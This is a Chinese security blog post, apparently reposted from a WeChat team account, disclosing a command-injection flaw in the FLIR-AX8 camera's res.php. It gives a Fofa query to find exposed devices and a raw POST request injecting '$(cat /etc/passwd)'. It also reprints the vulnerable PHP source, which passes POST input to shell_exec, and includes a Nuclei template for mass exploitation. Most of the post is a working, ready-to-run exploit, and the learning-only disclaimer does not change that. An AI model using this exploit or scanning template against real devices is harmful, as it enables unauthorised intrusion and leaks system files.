FLIR-AX8存在RCE漏洞

admin 2023年12月2日03:00:30评论36 views字数 3712阅读12分22秒阅读模式

FLIR-AX8存在RCE漏洞

01




#漏洞描述#

FLIR-AX8 res.php 文件存在命令执行漏洞,攻击者可以获取服务器权限


01




#漏洞复现#

步骤一:使用以下语法进行资产搜索并确定攻击目标...

# Fofa搜索app="FLIR-FLIR-AX8"

步骤二:开启BP并抓取首页数据包....修改数据包如下即可造成命令执行....

POST /res.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 39
action=node&resource=$(cat /etc/passwd)

FLIR-AX8存在RCE漏洞

步骤三:由于大部分设备处于内网且资产较少故不做深度漏洞测试...Over!

<?php  if (isset($_POST["action"])) {  switch ($_POST["action"]) {  case "get":  if(isset($_POST["resource"]))  {  switch ($_POST["resource"]) {  case ".rtp.hflip":  if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {  $result = "false";  break;  }  $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";break;case ".rtp.vflip":  if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {  $result = "false";  break;}$result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";break;default:$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));}}break;case "set":  if(isset($_POST["resource"]) and isset($_POST["value"])) {  switch ($_POST["resource"]) {    case "rtp.hflip":    file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");    break;    case "rtp.vflip":    file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");    break;    default:    $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;  }}
break;case "measurement": if (isset($_POST["type"]) && isset($_POST["id"])) { $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"])); $lines = explode("n", $nodeData); foreach($lines as $line) { $resource = preg_split('/s+/', $line); $value = trim($resource[1], """); $result[$resource[0]] = $value; }}break;case "global-parameters": $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));$lines = explode("n", $nodeData);foreach($lines as $line) { $resource = preg_split('/s+/', $line); $result[$resource[0]] = $resource[1]; }case "alarm": if(isset($_POST["id"])){ $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"])); $lines = explode("n", $nodeData); foreach($lines as $line) { $resource = preg_split('/s+/', $line); $value = trim($resource[1], """); $result[$resource[0]] = $value; }}break;case "calibrate": $result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");
break; case "node": $nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"])); $result = preg_split("/s+n/", $nodes); break; } echo json_encode($result); }?>


01




#批量脚本#


id: flir-ax8rce
info: name: flir-ax8rce author: Ph9ar severity: high description: flir-ax8rce reference: - https://4pts.online tags: rce
requests: - raw: - |- POST /res.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 26
action=node&resource=$(id)
matchers-condition: and matchers: - type: word part: body words: - root - type: status status: - 200


揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!

FLIR-AX8存在RCE漏洞




原文始发于微信公众号(揽月安全团队):FLIR-AX8存在RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月2日03:00:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FLIR-AX8存在RCE漏洞https://cn-sec.com/archives/2258689.html

发表评论

匿名网友 填写信息